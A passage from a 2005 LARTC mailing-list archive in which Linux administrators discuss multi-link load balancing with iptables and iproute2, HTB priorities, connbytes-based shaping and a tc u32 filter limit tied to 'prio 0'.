ACCEPT echo "Setting Mangle rules for eth0..." $IPTABLES -t mangle -A OUTPUT -o ! ${NET_INT_INT} -m random --average 50 -j ETH0 $IPTABLES -t mangle -A PREROUTING -i ${NET_INT_INT} -m random --average 50 -j ETH0 ip ro add table 10 default via ${NET_EXT_GW1} dev ${NET_EXT_INT1} ip ru add fwmark 1 table 10 ip ro fl ca echo "Setting Mangle rules for eth2..." $IPTABLES -t mangle -A OUTPUT -o ! ${NET_INT_INT} -m random --average 50 -j ETH2 $IPTABLES -t mangle -A PREROUTING -i ${NET_INT_INT} -m random --average 50 -j ETH2 ip ro add table 20 default via ${NET_EXT_GW2} dev ${NET_EXT_INT2} ip ru add fwmark 2 table 20 ip ro fl ca echo "Setting up spoofing rules..." $IPTABLES -t nat -A POSTROUTING -o ${NET_EXT_INT1} -j SPOOF_ETH0 $IPTABLES -t nat -A POSTROUTING -o ${NET_EXT_INT2} -j SPOOF_ETH2 echo "Adding default route..." ip ro add default nexthop via ${NET_EXT_GW1} dev ${NET_EXT_INT1} weight 1 nexthop via ${NET_EXT_GW2} dev ${NET_EXT_INT2} weight 1 echo "Disabling Reverse Path Filtering..." echo 0> /proc/sys/net/ipv4/conf/eth0/rp_filter echo 0> /proc/sys/net/ipv4/conf/eth2/rp_filter echo "Enabling IPv4 Packet forwarding..." echo "1"> /proc/sys/net/ipv4/ip_forward -- roderick e. tapang retapang at gmail dot com (o_.' http://counter.li.org/ //\ ---------------------- V_/_ Linux User # 253842 From nug@sch.bme.hu Tue Jan 18 08:30:05 2005 From: nug@sch.bme.hu (=?ISO-8859-1?Q?T=F3th_N=E1ndor?=) Date: Tue, 18 Jan 2005 09:30:05 +0100 Subject: [LARTC] failover works - but balancing does not In-Reply-To: References: Message-ID: <41ECC90D.7010206@sch.bme.hu> Hi! roderick tapang wrote: > here's the setup (two dsl - same provider) > > +-----> link1 > LAN----- linux box --| |----------internet > +-----> link2 > > the setup is ok in terms of the failover requirement. the other link > takes over when one is down. however, there is a very noticeable lag > when both lines are up. i've tried changing the weight value to a > higher one but the links are still under utilized and some client machines > playing games or mostly disconnected. taking down one link makes the > connection ok. > any suggestions? do i need to patch the kernel? I was in the situation like yours. Following the lartc howto did not result in correct functionality (not the same problems as yours). I managed to do it using these links: http://www.ssi.bg/~ja/nano.txt http://www.ssi.bg/~ja/#routes I had to read the nano howto about 5 times to understand it. -- Udv, Nandor From nug@sch.bme.hu Tue Jan 18 08:35:12 2005 From: nug@sch.bme.hu (=?ISO-8859-1?Q?T=F3th_N=E1ndor?=) Date: Tue, 18 Jan 2005 09:35:12 +0100 Subject: [LARTC] Doubt regarding priority of classes with HTB In-Reply-To: <20050118061115.8420123EF73@ws5-4.us4.outblaze.com> References: <20050118061115.8420123EF73@ws5-4.us4.outblaze.com> Message-ID: <41ECCA40.7090602@sch.bme.hu> Hi! sanjeev ravindran wrote: > Hi, > > I'm a bit confused with the priority of different classes with HTB. How it will be? Will the class with lowest no: have maximum priority? > > Any help is most appreciated, > Thanks in advance, > Sanjeev http://luxik.cdi.cz/~devik/qos/htb/manual/userg.htm#prio "Priorizing traffic has two sides. First it affects how the excess bandwidth is distributed among siblings. Up to now we have seen that excess bandwidth was distibuted according to rate ratios. Now I used basic configuration from chapter 3 (hierarchy without ceiling and bursts) and changed priority of all classes to 1 except SMTP (green) which I set to 0 (higher). From sharing view you see that the class got all the excess bandwidth. The rule is that classes with higher priority are offered excess bandwidth first. But rules about guaranted rate and ceil are still met." -- Udv, Nandor From toto@fortesys.ro Tue Jan 18 08:32:47 2005 From: toto@fortesys.ro (Iosif Peterfi) Date: Tue, 18 Jan 2005 10:32:47 +0200 Subject: [LARTC] iproute2 + iptables - match the connection time or packets sent/recieved References: <009501c4fc9b$3fd8f4d0$da01a8c0@FORTEWKS001> <200501171150.27568.jasonb@edseek.com> Message-ID: <00d001c4fd38$4f2a88c0$da01a8c0@FORTEWKS001> ----- Original Message ----- From: "Jason Boxman" To: Sent: Monday, January 17, 2005 6:50 PM Subject: Re: [LARTC] iproute2 + iptables - match the connection time or packets sent/recieved > On Monday 17 January 2005 08:48, Iosif Peterfi wrote: > > Hello, > > > > > All i want to do is shape the web traffic for long conections wich are not > > HTML webpages, i want to slow down those connections. > > I know that can be overriden by stopin/resuming the transfer but i still > > want to do it since people start downloading from HTTP with many > > connections, during the day and leave the office, i have no time to hunt > > them, so i just want to classify those connections if is possible. > > Sure, you can do that with the connbytes Netfilter module. After someone > downloads some given amount of data you can reclassify that traffic from > interactive-Web to bulk-Web or something similar. I've been meaning to do > this myself, but haven't gotten to it. Thanks a lot ! That was very usefull. I had some problems patching the kernel (I had to do it manually) since my gentoo kernel is already patched with a lot of other patches, but i managed to do it and works like a charm. > > -- > > Jason Boxman > Perl Programmer / *NIX Systems Administrator > Shimberg Center for Affordable Housing | University of Florida > http://edseek.com/ - Linux and FOSS stuff > > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > > > -- > This message was scanned for spam and viruses by BitDefender. > For more information please visit http://linux.bitdefender.com/ > > -- This message was scanned for spam and viruses by BitDefender. For more information please visit http://linux.bitdefender.com/ From toto@fortesys.ro Tue Jan 18 08:32:58 2005 From: toto@fortesys.ro (Iosif Peterfi) Date: Tue, 18 Jan 2005 10:32:58 +0200 Subject: [LARTC] iproute2 + iptables - match the connection time or packets sent/recieved References: <009501c4fc9b$3fd8f4d0$da01a8c0@FORTEWKS001> <200501171150.27568.jasonb@edseek.com> Message-ID: <00d101c4fd38$506a0da0$da01a8c0@FORTEWKS001> ----- Original Message ----- From: "Jason Boxman" To: Sent: Monday, January 17, 2005 6:50 PM Subject: Re: [LARTC] iproute2 + iptables - match the connection time or packets sent/recieved > On Monday 17 January 2005 08:48, Iosif Peterfi wrote: > > Hello, > > > > > All i want to do is shape the web traffic for long conections wich are not > > HTML webpages, i want to slow down those connections. > > I know that can be overriden by stopin/resuming the transfer but i still > > want to do it since people start downloading from HTTP with many > > connections, during the day and leave the office, i have no time to hunt > > them, so i just want to classify those connections if is possible. > > Sure, you can do that with the connbytes Netfilter module. After someone > downloads some given amount of data you can reclassify that traffic from > interactive-Web to bulk-Web or something similar. I've been meaning to do > this myself, but haven't gotten to it. Thanks a lot ! That was very usefull. I had some problems patching the kernel (I had to do it manually) since my gentoo kernel is already patched with a lot of other patches, but i managed to do it and works like a charm. > > -- > > Jason Boxman > Perl Programmer / *NIX Systems Administrator > Shimberg Center for Affordable Housing | University of Florida > http://edseek.com/ - Linux and FOSS stuff > > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > > > -- > This message was scanned for spam and viruses by BitDefender. > For more information please visit http://linux.bitdefender.com/ > > -- This message was scanned for spam and viruses by BitDefender. For more information please visit http://linux.bitdefender.com/ From Stanislav Nedelchev Tue Jan 18 14:29:59 2005 From: Stanislav Nedelchev (Stanislav Nedelchev) Date: Tue, 18 Jan 2005 16:29:59 +0200 Subject: [LARTC] stanislav.nedelchev@gmail.com Message-ID: <485817760501180629dfed89c@mail.gmail.com> stanislav.nedelchev@gmail.com From ro0ot@phreaker.net Tue Jan 18 14:34:06 2005 From: ro0ot@phreaker.net (ro0ot) Date: Tue, 18 Jan 2005 22:34:06 +0800 Subject: [LARTC] failover works - but balancing does not In-Reply-To: References: Message-ID: <41ED1E5E.3080707@phreaker.net> Hi, Can I know how is your failover works? Any additional scripts? Regards, ro0ot roderick tapang wrote: >here's the setup (two dsl - same provider) > > +-----> link1 >LAN----- linux box --| |----------internet > +-----> link2 > >the setup is ok in terms of the failover requirement. the other link >takes over when one is down. however, there is a very noticeable lag >when both lines are up. i've tried changing the weight value to a >higher one but the links are still under utilized and some client machines >playing games or mostly disconnected. taking down one link makes the >connection ok. >any suggestions? do i need to patch the kernel? > >below is the script i'm using on a mandrake 10.1 box. > >thanks. >erik > > >#!/bin/sh ># Iptables userspace executable >IPTABLES="/sbin/iptables" ># Internal Interface >NET_INT_INT=eth1 ># Internal IP >NET_INT_IP=192.168.0.101 ># Internal Subnet >NET_INT_SUB=/24 ># Internal Network >NET_INT_NET=192.168.0.0 ># First external interface >NET_EXT_INT1=eth0 ># First external IP >NET_EXT_IP1=192.168.1.7 ># First external interface's gateway >NET_EXT_GW1=192.168.1.1 ># Second external interface >NET_EXT_INT2=eth2 ># Second external IP >NET_EXT_IP2=192.168.1.3 ># Second external interface's gateway >NET_EXT_GW2=192.168.1.1 >echo "Flushing All Tables" >$IPTABLES -F >$IPTABLES -F -t nat >$IPTABLES -F -t mangle >$IPTABLES -X -t nat >$IPTABLES -X -t mangle >$IPTABLES -X > >$IPTABLES -t mangle -N ETH0 >$IPTABLES -t mangle -F ETH0 >$IPTABLES -t mangle -A ETH0 -j MARK --set-mark 1 > >$IPTABLES -t mangle -N ETH2 >$IPTABLES -t mangle -F ETH2 >$IPTABLES -t mangle -A ETH2 -j MARK --set-mark 2 > >$IPTABLES -t nat -N SPOOF_ETH0 >$IPTABLES -t nat -F SPOOF_ETH0" >$IPTABLES -t nat -A SPOOF_ETH0 -j SNAT --to ${NET_EXT_IP1} > >$IPTABLES -t nat -N SPOOF_ETH2 >$IPTABLES -t nat -F SPOOF_ETH2H2 " >$IPTABLES -t nat -A SPOOF_ETH2 -j SNAT --to ${NET_EXT_IP2} > >echo "Setting some local network rules..." >$IPTABLES -A INPUT -p icmp -s ${NET_INT_NET}/24 -d ${NET_INT_IP} -j ACCEPT > >echo "Setting Mangle rules for eth0..." >$IPTABLES -t mangle -A OUTPUT -o ! ${NET_INT_INT} -m random --average 50 -j ETH0 >$IPTABLES -t mangle -A PREROUTING -i ${NET_INT_INT} -m random >--average 50 -j ETH0 >ip ro add table 10 default via ${NET_EXT_GW1} dev ${NET_EXT_INT1} >ip ru add fwmark 1 table 10 >ip ro fl ca > >echo "Setting Mangle rules for eth2..." >$IPTABLES -t mangle -A OUTPUT -o ! ${NET_INT_INT} -m random --average 50 -j ETH2 >$IPTABLES -t mangle -A PREROUTING -i ${NET_INT_INT} -m random >--average 50 -j ETH2 >ip ro add table 20 default via ${NET_EXT_GW2} dev ${NET_EXT_INT2} >ip ru add fwmark 2 table 20 >ip ro fl ca > >echo "Setting up spoofing rules..." >$IPTABLES -t nat -A POSTROUTING -o ${NET_EXT_INT1} -j SPOOF_ETH0 >$IPTABLES -t nat -A POSTROUTING -o ${NET_EXT_INT2} -j SPOOF_ETH2 > >echo "Adding default route..." >ip ro add default nexthop via ${NET_EXT_GW1} dev ${NET_EXT_INT1} >weight 1 nexthop via ${NET_EXT_GW2} dev ${NET_EXT_INT2} weight 1 > >echo "Disabling Reverse Path Filtering..." >echo 0> /proc/sys/net/ipv4/conf/eth0/rp_filter >echo 0> /proc/sys/net/ipv4/conf/eth2/rp_filter > >echo "Enabling IPv4 Packet forwarding..." >echo "1"> /proc/sys/net/ipv4/ip_forward > > > > From RMoore@afsc.org Tue Jan 18 15:26:15 2005 From: RMoore@afsc.org (Rob Moore) Date: Tue, 18 Jan 2005 10:26:15 -0500 Subject: [LARTC] Archives and question Message-ID: Hello-- I am brand new to this list. I've been using a pre-packaged subset of Linux that comes with an application called IPCop. (If you're unfamiliar with IPCop, I think it's a wonderful, easy-to-use firewall application that will run on pretty low-end hardware.) But otherwise I'm pretty much a neophyte with Linux. Two questions: 1. Is there an archive for this list so I can look for previous postings on my topic? 2. I have a hub-and-spoke network, made up of about 30 IPCop firewalls in remote offices that all VPN back to an IPCop box here in the main office. The remote offices can all communicate with the main office, but none can communicate with each other directly. I need to get that inter-remote-site communication to work. I'm thinking some routing table entries ought to be able to do it, but I'm not familiar enough [read: not familiar at all] with Linux routing to know how to set it up. I'm hoping you all can tell me, A)if it will work or not, and B)how to get started. Thanks, Rob From sanjeev_ravindran@linuxmail.org Tue Jan 18 15:47:45 2005 From: sanjeev_ravindran@linuxmail.org (sanjeev ravindran) Date: Tue, 18 Jan 2005 23:47:45 +0800 Subject: [LARTC] Doubt regarding priority of classes with HTB Message-ID: <20050118154745.0B97023CF9@ws5-3.us4.outblaze.com> Thank you for ur response, Actually I too found the same in user guide of htb... however i was bit con= fused about the priority of different classes.... now things are clear... thanks again sanjeev ----- Original Message ----- From: "T=F3th N=E1ndor" To: lartc@mailman.ds9a.nl Subject: Re: [LARTC] Doubt regarding priority of classes with HTB Date: Tue, 18 Jan 2005 09:35:12 +0100 >=20 > Hi! >=20 > sanjeev ravindran wrote: > > Hi, > > > > I'm a bit confused with the priority of different classes with=20 > > HTB. How it will be? Will the class with lowest no: have maximum=20 > > priority? > > > > Any help is most appreciated, > > Thanks in advance, > > Sanjeev >=20 > http://luxik.cdi.cz/~devik/qos/htb/manual/userg.htm#prio >=20 > "Priorizing traffic has two sides. First it affects how the excess=20 > bandwidth is distributed among siblings. Up to now we have seen=20 > that excess bandwidth was distibuted according to rate ratios. Now=20 > I used basic configuration from chapter 3 (hierarchy without=20 > ceiling and bursts) and changed priority of all classes to 1 except=20 > SMTP (green) which I set to 0 (higher). > From sharing view you see that the class got all the excess=20 > bandwidth. The rule is that classes with higher priority are=20 > offered excess bandwidth first. But rules about guaranted rate and=20 > ceil are still met." >=20 > -- Udv, > Nandor > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ --=20 ______________________________________________ Check out the latest SMS services @ http://www.linuxmail.org=20 This allows you to send and receive SMS through your mailbox. Powered by Outblaze From dmitry@mikrotik.com Tue Jan 18 17:02:17 2005 From: dmitry@mikrotik.com (Dmitry Golubev) Date: Tue, 18 Jan 2005 19:02:17 +0200 Subject: [LARTC] Doubt regarding priority of classes with HTB In-Reply-To: <20050118154745.0B97023CF9@ws5-3.us4.outblaze.com> References: <20050118154745.0B97023CF9@ws5-3.us4.outblaze.com> Message-ID: <200501181902.17426.dmitry@mikrotik.com> Are you sure we do care about priorities of inner classes? It seems for me= =20 that you do not even have this entry in the memory structure in case of inn= er=20 class - only leaf classes have prios. Dmitry On Tuesday 18 January 2005 17:47, "sanjeev ravindran"=20 wrote: > Thank you for ur response, > Actually I too found the same in user guide of htb... however i was bit > confused about the priority of different classes.... now things are > clear... > thanks again > sanjeev > > > > ----- Original Message ----- > From: "T=F3th N=E1ndor" > To: lartc@mailman.ds9a.nl > Subject: Re: [LARTC] Doubt regarding priority of classes with HTB > Date: Tue, 18 Jan 2005 09:35:12 +0100 > > > Hi! > > > > sanjeev ravindran wrote: > > > Hi, > > > > > > I'm a bit confused with the priority of different classes with > > > HTB. How it will be? Will the class with lowest no: have maximum > > > priority? > > > > > > Any help is most appreciated, > > > Thanks in advance, > > > Sanjeev > > > > http://luxik.cdi.cz/~devik/qos/htb/manual/userg.htm#prio > > > > "Priorizing traffic has two sides. First it affects how the excess > > bandwidth is distributed among siblings. Up to now we have seen > > that excess bandwidth was distibuted according to rate ratios. Now > > I used basic configuration from chapter 3 (hierarchy without > > ceiling and bursts) and changed priority of all classes to 1 except > > SMTP (green) which I set to 0 (higher). > > From sharing view you see that the class got all the excess > > bandwidth. The rule is that classes with higher priority are > > offered excess bandwidth first. But rules about guaranted rate and > > ceil are still met." > > > > -- Udv, > > Nandor > > _______________________________________________ > > LARTC mailing list / LARTC@mailman.ds9a.nl > > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ From rio@martin.mu Wed Jan 19 10:32:17 2005 From: rio@martin.mu (Rio Martin.) Date: Wed, 19 Jan 2005 10:32:17 +0000 Subject: [LARTC] Confuse, putting packets in wrong mangle table. Message-ID: <200501191032.17988.rio@martin.mu> Folks, I am a little bit confuse in how to put these packets into correct mangle table for traffic shaping. This is what i ve planned to do: - - - - :eth0 [ LINUX-BOX ] eth1: - - - - Let say: eth0: 220.100.1.1 eth1: 192.168.1.1 eth1:1 192.168.1.2 192.168.1.0/24 get natted into 220.100.1.1 before reaching the internet. I put every packets coming from internet (eth0) this way: # iptables -t mangle -I PREROUTING -i eth0 .. * * * * But what if i would like to do the same way with ip 192.168.1.1 and 192.168.1.2 ? How to put the packets in correct mangle table? Thanks before .. Regards, Rio Martin. From nug@sch.bme.hu Wed Jan 19 08:19:58 2005 From: nug@sch.bme.hu (=?ISO-8859-1?Q?T=F3th_N=E1ndor?=) Date: Wed, 19 Jan 2005 09:19:58 +0100 Subject: [LARTC] Confuse, putting packets in wrong mangle table. In-Reply-To: <200501191032.17988.rio@martin.mu> References: <200501191032.17988.rio@martin.mu> Message-ID: <41EE182E.3000406@sch.bme.hu> Hi! Rio Martin. wrote: > Folks, > I am a little bit confuse in how to put these packets into correct mangle > table for traffic shaping. > > This is what i ve planned to do: > > - - - - :eth0 [ LINUX-BOX ] eth1: - - - - > > Let say: > eth0: 220.100.1.1 > eth1: 192.168.1.1 > eth1:1 192.168.1.2 > > 192.168.1.0/24 get natted into 220.100.1.1 before reaching the internet. > I put every packets coming from internet (eth0) this way: > # iptables -t mangle -I PREROUTING -i eth0 .. * * * * > > But what if i would like to do the same way with ip 192.168.1.1 and > 192.168.1.2 ? How to put the packets in correct mangle table? You can only shape traffic leaving your interface. You have to shape the incoming traffic at interface eth1, the outgoing traffic at interface eth0. This site is great for learning: http://www.knowplace.org/shaper/qdisc.html#egress I found to use iptables+CLASSIFY method the easiest way to classify packets. Your question is a little dizzy... -- Udv, Nandor From rio@martin.mu Wed Jan 19 16:57:15 2005 From: rio@martin.mu (Rio Martin.) Date: Wed, 19 Jan 2005 16:57:15 +0000 Subject: [LARTC] Re: Confuse, putting packets in wrong mangle table. Message-ID: <200501191657.15767.rio@martin.mu> On Wed, 19 Jan 2005 09:19:58 +0100 T=F3th N=E1ndor wrote: Rio Martin. wrote: >> Folks, >> I am a little bit confuse in how to put these packets into correct mangl= e=20 >> table for traffic shaping. >> This is what i ve planned to do: >>=20 >> - - - - :eth0 [ LINUX-BOX ] eth1: - - - - >>=20 >> Let say: >> eth0: 220.100.1.1 >> eth1: 192.168.1.1 >> eth1:1 192.168.1.2 >> >> 192.168.1.0/24 get natted into 220.100.1.1 before reaching the internet. >> I put every packets coming from internet (eth0) this way: >> # iptables -t mangle -I PREROUTING -i eth0 .. * * * * >>=20 >> But what if i would like to do the same way with ip 192.168.1.1 and=20 >> 192.168.1.2 ? How to put the packets in correct mangle table? >You can only shape traffic leaving your interface. You have to shape the=20 >incoming traffic at interface eth1, the outgoing traffic at interface eth0. >This site is great for learning: >http://www.knowplace.org/shaper/qdisc.html#egress >I found to use iptables+CLASSIFY method the easiest way to classify packet= s. > >Your question is a little dizzy... Oopss sorry then :)) Actually, there is squid proxy running in my box, with those two private IP= s=20 (192.168.1.1 & 192.168.1.2) Both get natted to 220.100.1.1. I need to shape incoming traffic to both of these ips but i am affraid i ha= ve=20 to face that i am not able to shape traffic which is generate from this box= =20 unless those two IPs were outside the box. If i have one more public IP than i should not so much worry about, cause i= =20 can shape it using IMQ. So any other ideas maybe? i'm thinkin just in case IMQ would help .. Thanks for the info u gave anyway.. =2D Rio.Martin - From liviu.faciu@astral.ro Wed Jan 19 10:12:00 2005 From: liviu.faciu@astral.ro (Liviu Faciu) Date: Wed, 19 Jan 2005 12:12:00 +0200 Subject: [LARTC] Writing rules direct to Kernel Message-ID: <1106129520.9814.100.camel@tehnic6.bacau.astral.ro> Hi, I'm interested to write rules direct in Kernel space memory and not to execute the tc command. Have anyone done this before ? Any ideas ? Sources ? Thank you, Liviu -- This message was scanned for spam and viruses by BitDefender. For more information please visit http://linux.bitdefender.com/ From victor@nk.nl Wed Jan 19 11:24:53 2005 From: victor@nk.nl (Victor Julien) Date: Wed, 19 Jan 2005 11:24:53 +0000 Subject: [LARTC] Writing rules direct to Kernel In-Reply-To: <1106129520.9814.100.camel@tehnic6.bacau.astral.ro> References: <1106129520.9814.100.camel@tehnic6.bacau.astral.ro> Message-ID: <41EE4385.6030705@nk.nl> Liviu Faciu wrote: > Hi, > > I'm interested to write rules direct in Kernel space memory and not to > execute the tc command. Have anyone done this before ? Any ideas ? > Sources ? > Thank you, > Liviu > > > Hi Liviu, take a look at this: http://www.coverfire.com/lql/ i have no experience with it, but it looks promising... Regards, Victor From util@deuroconsult.ro Wed Jan 19 10:27:40 2005 From: util@deuroconsult.ro (Catalin(ux aka Dino) BOIE) Date: Wed, 19 Jan 2005 12:27:40 +0200 (EET) Subject: [LARTC] Writing rules direct to Kernel In-Reply-To: <1106129520.9814.100.camel@tehnic6.bacau.astral.ro> References: <1106129520.9814.100.camel@tehnic6.bacau.astral.ro> Message-ID: On Wed, 19 Jan 2005, Liviu Faciu wrote: > Hi, > > I'm interested to write rules direct in Kernel space memory and not to > execute the tc command. Have anyone done this before ? Any ideas ? > Sources ? > Thank you, > Liviu Take a look at iproute2 sources. There you have a lib that you can use to what you want. Yes, is doable. > > > > -- > This message was scanned for spam and viruses by BitDefender. > For more information please visit http://linux.bitdefender.com/ > > > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ From George Alexandru Dragoi Wed Jan 19 10:53:57 2005 From: George Alexandru Dragoi (George Alexandru Dragoi) Date: Wed, 19 Jan 2005 12:53:57 +0200 Subject: [LARTC] Writing rules direct to Kernel In-Reply-To: References: <1106129520.9814.100.camel@tehnic6.bacau.astral.ro> Message-ID: <3063e5050119025336f2dee1@mail.gmail.com> I'm intersted too in a program that take an entire qos struncture tree and filters and put them instantly in kernel, like iptables, i wonder if there is such project On Wed, 19 Jan 2005 12:27:40 +0200 (EET), Catalin(ux aka Dino) BOIE wrote: > On Wed, 19 Jan 2005, Liviu Faciu wrote: > > > Hi, > > > > I'm interested to write rules direct in Kernel space memory and not to > > execute the tc command. Have anyone done this before ? Any ideas ? > > Sources ? > > Thank you, > > Liviu > > Take a look at iproute2 sources. There you have a lib that you can use to > what you want. Yes, is doable. > > > > > > > > > -- > > This message was scanned for spam and viruses by BitDefender. > > For more information please visit http://linux.bitdefender.com/ > > > > > > _______________________________________________ > > LARTC mailing list / LARTC@mailman.ds9a.nl > > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > > > > --- > Catalin(ux aka Dino) BOIE > catab at deuroconsult.ro > http://kernel.umbrella.ro/ > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > -- Bla bla From =?ISO-8859-1?Q?Martin_Schi=F8tz?= Wed Jan 19 11:33:53 2005 From: =?ISO-8859-1?Q?Martin_Schi=F8tz?= (=?ISO-8859-1?Q?Martin_Schi=F8tz?=) Date: Wed, 19 Jan 2005 12:33:53 +0100 Subject: [LARTC] tc limit Message-ID: Hi I have been playing with tc. I'm using htb and sfq. I tried to setup shaping of every ip address within a /20. I found that there must be an upper limit of about 2096 on the number of rules (classes, qdiscs or filters). I was testing a /20 which gives 4096 classes, qdiscs and filters. I'm using hashkey to optimize processing of frames. When executing the script below - it stops when adding rules for "ip 10.0.7.253" with this error: handle 1:4097 handle 1:4099 handle 1:4101 RTNETLINK answers: File exists We have an error talking to the kernel handle 1:4103 RTNETLINK answers: File exists We have an error talking to the kernel handle 1:4105 ... ... etc. Is there a limit with tc or I'm I doing something wrong ? (I'm using iproute2-2.6.9-041019) This is the script: #!/bin/sh /sbin/tc qdisc add dev eth1 root handle 1: htb /sbin/tc class add dev eth1 parent 1: classid 1:3 htb rate 34mbit ceil 34mbit burst 0kbit cburst 0kbit /sbin/tc filter add dev eth1 parent 1:3 protocol ip u32 /sbin/tc filter add dev eth1 parent 1:3 handle 3: protocol ip u32 divisor 256 /sbin/tc filter add dev eth1 protocol ip parent 1: u32 match ip dst 10.0.0.0/20 hashkey mask 0x000000ff at 16 link 3: echo handle 1:13 /sbin/tc class add dev eth1 parent 1:3 classid 1:13 htb rate 512kbit ceil 512kbit burst 0k cburst 0k /sbin/tc qdisc add dev eth1 parent 1:13 handle 13: sfq perturb 4 /sbin/tc filter add dev eth1 protocol ip parent 1:3 u32 ht 3:1: match ip dst 10.0.0.1 flowid 1:13 echo handle 1:15 /sbin/tc class add dev eth1 parent 1:3 classid 1:15 htb rate 512kbit ceil 512kbit burst 0k cburst 0k /sbin/tc qdisc add dev eth1 parent 1:15 handle 15: sfq perturb 4 /sbin/tc filter add dev eth1 protocol ip parent 1:3 u32 ht 3:2: match ip dst 10.0.0.2 flowid 1:15 ... ... echo handle 1:4101 /sbin/tc class add dev eth1 parent 1:3 classid 1:4101 htb rate 512kbit ceil 512kbit burst 0k cburst 0k /sbin/tc qdisc add dev eth1 parent 1:4101 handle 4101: sfq perturb 4 /sbin/tc filter add dev eth1 protocol ip parent 1:3 u32 ht 3:fd: match ip dst 10.0.7.253 flowid 1:4101 ... ... echo handle 1:8201 /sbin/tc class add dev eth1 parent 1:3 classid 1:8201 htb rate 512kbit ceil 512kbit burst 0k cburst 0k /sbin/tc qdisc add dev eth1 parent 1:8201 handle 8201: sfq perturb 4 /sbin/tc filter add dev eth1 protocol ip parent 1:3 u32 ht 3:ff: match ip dst 10.0.15.255 flowid 1:8201 From gypsy@iswest.com Wed Jan 19 15:12:56 2005 From: gypsy@iswest.com (gypsy) Date: Wed, 19 Jan 2005 07:12:56 -0800 Subject: [LARTC] tc limit References: Message-ID: <41EE78F8.4826B6C8@iswest.com> Martin Schiøtz wrote: > > Hi Hello. > I have been playing with tc. I'm using htb and sfq. I tried to setup > shaping of every ip address within a /20. > I found that there must be an upper limit of about 2096 on the number > of rules (classes, qdiscs or filters). I was testing a /20 which gives > 4096 classes, qdiscs and filters. I'm using hashkey to optimize > processing of frames. Filters. > Is there a limit with tc or I'm I doing something wrong ? Yes, sort of. Yes. > This is the script: > #!/bin/sh > > /sbin/tc filter add dev eth1 parent 1:3 protocol ip u32 'prio #' must be included in all 'filter' lines where "#" is not zero and is always the same; the "zero prio" has a limit and there is a limit on '#' - but no limit on how many times '#' can be (e.g.) 5 So, e.g.: tc filter add dev eth1 parent 1: protocol ip prio 5 \ u32 match ip src $IP flowid 1:40 will run at least 64K times without complaint, but this will fail after ~2K: tc filter add dev eth1 parent 1: protocol ip prio 0 \ u32 match ip src $IP flowid 1:40 > /sbin/tc filter add dev eth1 parent 1:3 handle 3: protocol ip u32 divisor 256 > /sbin/tc filter add dev eth1 protocol ip parent 1: u32 match ip dst > 10.0.0.0/20 hashkey mask 0x000000ff at 16 link 3: google LARTC please document gypsy From liviu.faciu@astral.ro Wed Jan 19 15:36:31 2005 From: liviu.faciu@astral.ro (Liviu Faciu) Date: Wed, 19 Jan 2005 17:36:31 +0200 Subject: [LARTC] Writing rules direct to Kernel In-Reply-To: <41EE4385.6030705@nk.nl> References: <1106129520.9814.100.camel@tehnic6.bacau.astral.ro> <41EE4385.6030705@nk.nl> Message-ID: <1106148991.9814.132.camel@tehnic6.bacau.astral.ro> Thank you, Very good idea. Liviu On Wed, 2005-01-19 at 11:24 +0000, Victor Julien wrote: > Liviu Faciu wrote: > > Hi, > > > > I'm interested to write rules direct in Kernel space memory and not to > > execute the tc command. Have anyone done this before ? Any ideas ? > > Sources ? > > Thank you, > > Liviu > > > > > > > > Hi Liviu, > > take a look at this: > http://www.coverfire.com/lql/ > > i have no experience with it, but it looks promising... > > Regards, > Victor > > -- This message was scanned for spam and viruses by BitDefender. For more information please visit http://linux.bitdefender.com/ From =?ISO-8859-1?Q?Martin_Schi=F8tz?= Wed Jan 19 16:54:02 2005 From: =?ISO-8859-1?Q?Martin_Schi=F8tz?= (=?ISO-8859-1?Q?Martin_Schi=F8tz?=) Date: Wed, 19 Jan 2005 17:54:02 +0100 Subject: [LARTC] tc limit In-Reply-To: <41EE78F8.4826B6C8@iswest.com> References: <41EE78F8.4826B6C8@iswest.com> Message-ID: Thanks, with "prio #" on all filters - all rules can be added.=20 :-) Just curious - Is there a reason for the ~2K limit on filters with "prio 0"= ? Martin On Wed, 19 Jan 2005 07:12:56 -0800, gypsy wrote: > Martin Schi=F8tz wrote: > > > > Hi >=20 > Hello. >=20 > > I have been playing with tc. I'm using htb and sfq. I tried to setup > > shaping of every ip address within a /20. > > I found that there must be an upper limit of about 2096 on the number > > of rules (classes, qdiscs or filters). I was testing a /20 which gives > > 4096 classes, qdiscs and filters. I'm using hashkey to optimize > > processing of frames. >=20 > Filters. >=20 > > Is there a limit with tc or I'm I doing something wrong ? >=20 > Yes, sort of. Yes. >=20 > > This is the script: > > #!/bin/sh > > >=20 > > /sbin/tc filter add dev eth1 parent 1:3 protocol ip u32 >=20 > 'prio #' must be included in all 'filter' lines where "#" is not zero > and is always the same; the "zero prio" has a limit and there is a limit > on '#' - but no limit on how many times '#' can be (e.g.) 5 >=20 > So, e.g.: > tc filter add dev eth1 parent 1: protocol ip prio 5 \ > u32 match ip src $IP flowid 1:40 >=20 > will run at least 64K times without complaint, but this will fail after > ~2K: > tc filter add dev eth1 parent 1: protocol ip prio 0 \ > u32 match ip src $IP flowid 1:40 >=20 > > /sbin/tc filter add dev eth1 parent 1:3 handle 3: protocol ip u32 divis= or 256 > > /sbin/tc filter add dev eth1 protocol ip parent 1: u32 match ip dst > > 10.0.0.0/20 hashkey mask 0x000000ff at 16 link 3: >=20 > google LARTC please document >=20 > gypsy > From fx.lebail@free.fr Wed Jan 19 17:09:34 2005 From: fx.lebail@free.fr (Francois-Xavier Le Bail) Date: Wed, 19 Jan 2005 18:09:34 +0100 Subject: [LARTC] ip route, rule and TOS Message-ID: 